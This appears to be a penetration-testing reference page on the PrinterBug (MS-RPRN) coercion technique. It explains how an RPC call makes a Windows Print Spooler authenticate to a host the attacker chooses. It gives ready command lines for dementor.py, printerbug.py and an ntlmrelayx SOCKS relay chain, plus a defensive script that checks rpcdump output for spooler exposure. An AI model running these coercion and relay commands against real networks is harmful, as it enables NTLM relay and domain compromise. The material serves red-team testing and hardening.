MS-RPRN abuse (PrinterBug)

Theory

Microsoft’s Print Spooler is a service that handles print jobs and various other printing-related tasks. An attacker controlling a domain user or computer account can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a host of the attacker's choosing. Microsoft considers this flaw a "won't fix", and the behaviour is enabled by default on all Windows environments (more info on the finding).
The "specific call" mentioned above is the RpcRemoteFindFirstPrinterChangeNotificationEx notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol: it defines the communication for print job processing and print system management between a print client and a print server.
The attacker needs a foothold on the domain (i.e. a compromised account) for this attack to work, since the coercion is operated through an RPC call over the \pipe\spoolss SMB named pipe, reached through the IPC$ share.

Practice

Remotely checking whether the spooler is available can be done with SpoolerScanner (PowerShell) or with rpcdump (Python).
The spooler service can be triggered with printerbug (Python), dementor (Python), or the adapted original .NET code (here).
Trigger the spooler service with dementor:

    dementor.py -d $DOMAIN -u $DOMAIN_USER -p $PASSWORD $ATTACKER_IP $TARGET

Trigger the spooler service with printerbug:

    printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'

Check if the spooler service is available with rpcdump:

    rpcdump.py $TARGET | grep -A 6 "spoolsv"
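The rpcdump check above can be scripted to inventory which hosts still expose the spooler interface, for instance to verify that disabling the Print Spooler on domain controllers actually took effect. This is an added example, not code from The Hacker Recipes or from impacket; it assumes the block layout of rpcdump.py output reproduced in the constructed sample, and relies on MS-RPRN's interface UUID 12345678-1234-abcd-ef00-0123456789ab (the host name, IP address and port in the sample are made up).

```python
import re

# MS-RPRN (Print System Remote Protocol) interface UUID, registered by spoolsv.exe.
MS_RPRN_UUID = "12345678-1234-abcd-ef00-0123456789ab"

# Constructed sample modelled on impacket rpcdump.py's block layout; host, IP and port are made up.
SAMPLE_RPCDUMP_OUTPUT = """\
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_ip_tcp:192.0.2.10[49666]
          ncacn_np:\\\\DC01[\\pipe\\spoolss]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
          ncacn_np:\\\\DC01[\\pipe\\svcctl]
"""


def parse_rpcdump(text: str) -> list[dict[str, object]]:
    """Split rpcdump-style output into one record per blank-line-separated endpoint block."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec: dict[str, object] = {"bindings": []}
        for line in block.splitlines():
            key, sep, value = line.partition(":")
            if sep and key.strip() in ("Protocol", "Provider", "UUID"):
                rec[key.strip().lower()] = value.strip()
            elif sep and line.startswith(" "):  # indented line under "Bindings:"
                rec["bindings"].append(line.strip())
        records.append(rec)
    return records


def spooler_endpoints(text: str) -> list[str]:
    """Return the bindings through which MS-RPRN is reachable; empty means the spooler is not exposed."""
    exposed = []
    for rec in parse_rpcdump(text):
        uuid = str(rec.get("uuid", "")).split(" ")[0].lower()
        if uuid == MS_RPRN_UUID or str(rec.get("provider", "")).lower() == "spoolsv.exe":
            exposed.extend(rec["bindings"])
    return exposed


if __name__ == "__main__":
    for binding in spooler_endpoints(SAMPLE_RPCDUMP_OUTPUT):
        print("MS-RPRN reachable via", binding)
```

Feed it the saved output of rpcdump.py for each host; a host that returns no bindings no longer registers the spooler interface and cannot be coerced this way.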
In the situation where the tester doesn't have any credentials, it is still possible to relay an authentication to the target and then trigger its spooler service through the resulting SOCKS proxy:

    ntlmrelayx.py -t smb://$TARGET -socks
    proxychains dementor.py -d $DOMAIN -u $DOMAIN_USER $ATTACKER_IP $TARGET
Nota bene: the coerced NTLM authentication will be made over SMB. This is important because it restricts the possibilities for NTLM relay. For instance, an "unsigning cross-protocols relay attack" from SMBv2 to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.

Resources

Not A Security Boundary: Breaking Forest Trusts - harmj0y